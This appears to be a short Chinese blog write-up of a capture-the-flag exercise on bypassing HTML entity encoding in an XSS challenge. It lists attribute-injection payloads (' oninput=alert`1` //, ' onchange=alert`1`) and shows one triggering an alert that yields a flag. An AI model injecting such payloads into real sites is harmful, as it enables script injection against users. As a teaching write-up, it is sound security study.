xss实体绕过示例
2024-09-01 06:52:07
知识点:
倘若是在script、input标签当中,即可突破。
Payload
' oninput=alert`1` // 当要在input中输入内容时触发事件
' oninput=alert`1` ' 同上
' onchange=alert`1` // 发生改变的时候触发该事件
' onchange=alert`1` ' 同上
在script里直接alert
示例:
首选输入测试语句<script>alert(/Micr067/)</script>,
查看源码发现做了实体编码。
使用xss实体绕过即可突破,
先输入 ' oninput=alert`1` // 提交,
在input中输入内容时触发事件,输入数字1即触发xss弹窗,
获得flag{Network_security_Era}
最新文章
- C#写文本日志帮助类(支持多线程)
- prim(与边无关,适合稠密的图,o(n^2))---还是畅通工程
- 有趣的JavaScript
- C# RSA在服务上使用出现拒绝方法错误的解决方法
- libevent linux安装
- document.getElementById(";searchForm";).submit is not a function
- Hibernate与JPA的区别是什么
- On the structure of submodule of finitely generated module over PID
- 【原创】大数据基础之Logstash(4)高可用
- Java课程寒假之《人月神话》有感之二
- Linux环境上部署Flask
- activiti官网实例项目activiti-explorer之扩展流程节点属性2
- VeeamBackup9.5-查看和添加备份设备
- pip安装pycrypto报错:Microsoft Visual C++ 14.0 is required. 和 SSLError: HTTPSConnectionPool的解决办法
- 浅谈Redis之慢查询日志
- 你要的fpga&;数字前端笔面试题都在这儿了
- Idea调试
- Kosaraju算法学习
- .net core 下的一个docker hello world
- [转]HTTP Error 502.5 - Process Failure asp.net core error in IIS